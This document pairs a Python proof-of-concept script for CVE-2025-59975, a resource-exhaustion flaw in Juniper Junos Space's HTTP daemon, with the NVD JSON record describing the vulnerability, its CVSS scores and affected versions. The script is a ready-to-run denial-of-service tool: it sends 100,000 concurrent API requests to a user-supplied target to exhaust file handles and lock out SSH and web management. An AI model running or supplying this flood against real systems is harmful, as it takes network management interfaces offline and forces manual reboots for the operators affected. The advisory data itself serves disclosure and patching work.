CVE-2025-59975

#!/usr/bin/env python3 # CVE-2025-59975 - Juniper Junos Space HTTP Daemon Resource Exhaustion DoS # PoC: Floods the target with inbound API calls to exhaust file handles # WARNING: For authorized security testing only import asyncio import aiohttp import sys from urllib.parse import urljoin TARGET_URL = "http://target-junos-space.example.com" API_ENDPOINT = "/api/space/user-management/local-users" # Example API endpoint CONCURRENT_CONNECTIONS = 1000 TOTAL_REQUESTS = 100000 async def flood_request(session, url, request_id): """Send a single HTTP request to exhaust file handles on the target""" try: async with session.get(url, timeout=5) as response: print(f"[Request {request_id}] Status: {response.status}") except Exception as e: print(f"[Request {request_id}] Error: {e}") async def main(target): """Main attack function - continuously floods target with API calls""" url = urljoin(target, API_ENDPOINT) connector = aiohttp.TCPConnector(limit=CONCURRENT_CONNECTIONS) async with aiohttp.ClientSession(connector=connector) as session: tasks = [] for i in range(TOTAL_REQUESTS): task = asyncio.create_task(flood_request(session, url, i)) tasks.append(task) # Maintain a steady stream of requests if len(tasks) >= CONCURRENT_CONNECTIONS: await asyncio.gather(*tasks, return_exceptions=True) tasks = [] if tasks: await asyncio.gather(*tasks, return_exceptions=True) if __name__ == "__main__": target = sys.argv[1] if len(sys.argv) > 1 else TARGET_URL print(f"[*] Starting DoS attack against: {target}") asyncio.run(main(target))

{"cve": {"id": "CVE-2025-59975", "sourceIdentifier": "[email protected]", "published": "2025-10-09T16:15:47.280", "lastModified": "2026-01-23T18:37:40.190", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "An Uncontrolled Resource Consumption vulnerability in the HTTP daemon (httpd) of Juniper Networks Junos Space allows an unauthenticated network-based attacker flooding the device with inbound API calls to consume all resources on the system, leading to a Denial of Service (DoS).\n\nAfter continuously flooding the system with inbound connection requests, all available file handles become consumed, blocking access to the system via SSH and the web user interface (WebUI), resulting in a management interface DoS. A manual reboot of the system is required to restore functionality.\n\nThis issue affects Junos Space: \n * all versions before 22.2R1 Patch V3, \n * from 23.1 before 23.1R1 Patch V3."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:L/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:Y/R:U/V:C/RE:M/U:X", "baseScore": 8.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "LOW", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "YES", "Recovery": "USER", "valueDensity": "CONCENTRATED", "vulnerabilityResponseEffort": "MODERATE", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-400"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:juniper:junos_space:*:*:*:*:*:*:*:*", "versionEndExcluding": "22.2", "matchCriteriaId": "6BE0C5AA-A098-4A03-8F8F-3EDC253211D1"}, {"vulnerable": true, "criteria": "cpe:2.3:a:juniper:junos_space:22.2:r1:*:*:*:*:*:*", "matchCriteriaId": "022F09D3-1F23-459B-BA76-14FABB2CB2E6"}, {"vulnerable": true, "criteria": "cpe:2.3:a:juniper:junos_space:23.1:r1:*:*:*:*:*:*", "matchCriteriaId": "2B4163AD-07D3-4C60-9277-0ACCFBD24255"}]}]}], "references": [{"url": "https://supportportal.juniper.net/JSA103172", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}